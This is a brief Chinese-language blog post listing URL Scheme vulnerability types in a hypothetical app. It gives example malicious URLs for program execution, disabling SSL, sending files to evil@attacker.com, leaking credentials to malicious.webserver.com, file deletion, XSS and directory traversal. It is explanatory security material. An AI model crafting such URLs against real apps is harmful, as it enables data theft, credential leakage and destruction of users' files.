URL Scheme安全漏洞案例

发表于 | 阅读次数:

  • URL Scheme可能存在的问题

    1. 调起内部敏感组件或数据
      myapp://cmd/run?program=/path/to/program/to/run
    2. 直接更改内部配置
      myapp://cmd/set_preference?use_ssl=false
    3. 泄露内部敏感文件
      myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file
    4. 删除某些敏感文件
      myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on
    5. 泄露凭据信息
      myapp://cmd/login_to?server_to_send_credentials=malicious.webserver.com
    6. 未过滤数据导致的xss
      myapp://cmd/adduser=’>”>
    7. 目录穿越
      myapp://use_template?template=/../../../../../../../../some/other/file